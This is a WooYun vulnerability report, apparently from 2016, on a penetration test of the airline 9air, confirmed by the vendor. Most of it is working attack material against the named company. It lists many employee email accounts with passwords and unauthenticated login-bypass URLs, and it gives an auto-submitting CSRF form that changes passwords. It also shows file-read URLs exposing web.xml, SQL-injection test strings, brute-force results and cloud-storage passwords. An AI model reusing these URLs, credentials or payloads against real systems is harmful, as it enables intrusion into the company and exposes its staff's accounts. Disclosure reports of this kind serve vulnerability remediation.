当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205283

漏洞标题:一次对九元航空的渗透测试

相关厂商:9air.com

漏洞作者: harbour_bin

提交时间:2016-05-05 14:40

修复时间:2016-06-19 15:50

公开时间:2016-06-19 15:50

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

看到九元航空在乌云上注册了, 就测试一下

详细说明:

#1 邮箱信息收集+泄漏密码采集, 获取一下邮箱帐号
http://mail.9air.com/

noc@9air.com 9air.com
liuxunbin@9air.com 9air.com
chenxin1@9air.com 9air.com
wangren@9air.com 9air.com
guoxiaogang@9air.com 9air.com
sunli@9air.com 9air.com
liumeng@9air.com 9air.com
huanghonghai@9air.com 9air.com
lianghanzhao@9air.com 9air.com
zhangwenzhao@9air.com 9air.com
zhangwenting@9air.com 9air.com
wgzp@9air.com 9air.com
wgcd@9air.com 9air.com
outstation@9air.com 9air.com
hc@9air.com 9air.com
wxgcbjb@9air.com 9air.com
aqzlc@9air.com 9air.com
songguibin@9air.com 9air.com
huoyunchu@9air.com 9air.com
lichaoxu@9air.com 9air.com
zhaoyujie@9air.com 9air.com
wangxuezi@9air.com 9air.com
luojunjie@9air.com 9air.com
lixinya@9air.com 9air.com
lijiefu@9air.com 9air.com
jingxuejun@9air.com 9air.com
guowenliang@9air.com 9air.com
chenyongcai@9air.com 9air.com
wenxudong@9air.com 9air.com
jiaomingyi@9air.com 9air.com
sunshina@9air.com 9air.com
baidu@9air.com 9air.com
liangjieming@9air.com 9air.com
jiazhenxiu@9air.com 9air.com
sms@9air.com jyh9air.com
songkai@9air.com 8air.com
wangziping@9air.com 8air.com
xiebo@9air.com 8air.com
zhujunjie@9air.com 8air.com
liuyongqiang@9air.com 8air.com
heli@9air.com 8air.com
weixinqiye@9air.com 9air.com2015
service@9air.com 9air.com2015
ppsj@9air.com 9air.com2015


泄漏敏感文件、通讯录、内网信息和监控信息等

9air-mail.png


#2 业务逻辑

http://sms.9air.com/oa!aircrewLogin?username=DingJun&airuser.aircrewName=丁军&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A
直接进去了
分析后, 发现username、airuser.aircrewName、airuser.aircrewDepartment.aircrewDeptCode三个正确就可以进去了
实例1:
http://sms.9air.com/oa!aircrewLogin?username=sms&airuser.aircrewName=SMS&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A
实例2:
http://sms.9air.com/oa!aircrewLogin?username=gaoweixing&airuser.aircrewName=高卫星&airuser.aircrewDepartment.aircrewDeptCode=CW05&dutycode=A


SMS

9air-sms.png


9air-sms-1.png


高卫星

9air-sms-2.png


crew系统修改密码处

http://crew.9air.com/personal_change_password.jsp


<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="Generator" content="EditPlus®">
<meta name="Author" content="">
<meta name="Keywords" content="">
<meta name="Description" content="">
<title>Document</title>
</head>
<body>
<form method="post" action="http://crew.9air.com/personal_change_password.jsp" id="edit">
<input name="newPass" type="text" value="9air.com1">
<input name="validPass" type="text" value="9air.com1">
</form>
</body>
<script>
document.getElementById("edit").submit();
</script>
</html>


Crew系统, 修改密码处未验证验证原密码, 结合邮箱, 可CSRF实现密码修改
#3 文件读取

sms.9air.com/reqManagement.action?fileName=web.txt&&fileAddr=/WEB-INF/web.xml
sms.9air.com/reqManagement.action?fileName=web.txt&&fileAddr=/WEB-INF/classes/log4j.properties


9air-sms-file.png


9air-sms-file1.png


#4 SQL注入

http://oa.9air.com:8081//services/


9air-oa-2.png


举例

9air-oa-3.png


1' or 'a'='a 结果为4
1' or 'a'='b 结果为5
用户名长度

9air-oa-6.png


具体可参考
WooYun: 泛微协同商务系统e-cology某处SQL注入(附验证中转脚本)
WooYun: 泛微OA某接口无需登录可执行任意SQL语句(附脚本)
#5 帐号体系控制不严, 进入多个系统
http://crew.9air.com/

dingjun	9air.com
zhaohaili
wangxiong
lixiaoming
chenli
chenhao
lijinglin
caoyuanhe
zhangben
liuyongqiang
jiazhenxiu
lijiayi 888888
wangren
liuguangping
limengkan
shizhaojin
fengbo
jiangchao
yangsibo
zhuxingyan
songyuan
yangxiangdong
wangqi
wangyao
wuyuhao
houfeiyu
liuyiming
hudongli
caoning
yangjin
yangyidong
fuyu
chenweibin
caoyuanhe
yangjian
chenyupei
wenxudong
sunshina
liujingwen
zhaoyafang
yanyu
zhangxinyu
cuiyongtao
qiaozhu
lijiaming
zhaodongchen
hejian
hanfanliang
changxiaobo
xulihao
fangxiangyun
maquan
xiaohaodi
wangyiran
lichaoa
liangshuang
tianmeng
liuquan
huqigang
yangqining
heli 8air.com
gechunlian abc123456
liyuzhu 123456
hejiangtao 123456
liuyingbing a123456


9air-crew1.png


oa.9air.com
举例说明, 还有很多的

高卫星 9air.com
关锋 9air.com


9air-oa.png


9air-oa-1.png


http://203.156.207.29:8080/mes/

Payload1	Payload2	Status	Length
niejiangnan aaaa 200 18830
yanjun 123456 200 15292
luochihong aaaa 200 8547
xuweibiao aaaa 200 8350
huanghe aaaa 200 8344
yiniansheng aaaa 200 7868
wangchunhui aaaa 200 1035
sujianlin aaaa 200 1033
liusiqi aaaa 200 1031
xuqinghai aaaa 200 1030


9air-mes.png


#5 外围信息

微云 3091984313或者dingjianchejian@9air.com  密码:dingjianchejian
百度云 wgqc@9air.com,密码:9air.com;
wgtm@9air.com,密码:9air.com

漏洞证明:

已证明!

修复方案:

1、邮箱弱密码不能只是发邮件, 是否可以强制修改
2、业务逻辑部分, 重新设计一下
3、OA的SQL注入问题, 联系泛微吧
4、多个系统账户体系问题, 添加验证码+修改弱口令
5、你们更专业

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-05 15:48

厂商回复:

万恶的弱密码。

最新状态:

暂无


漏洞评价:

评价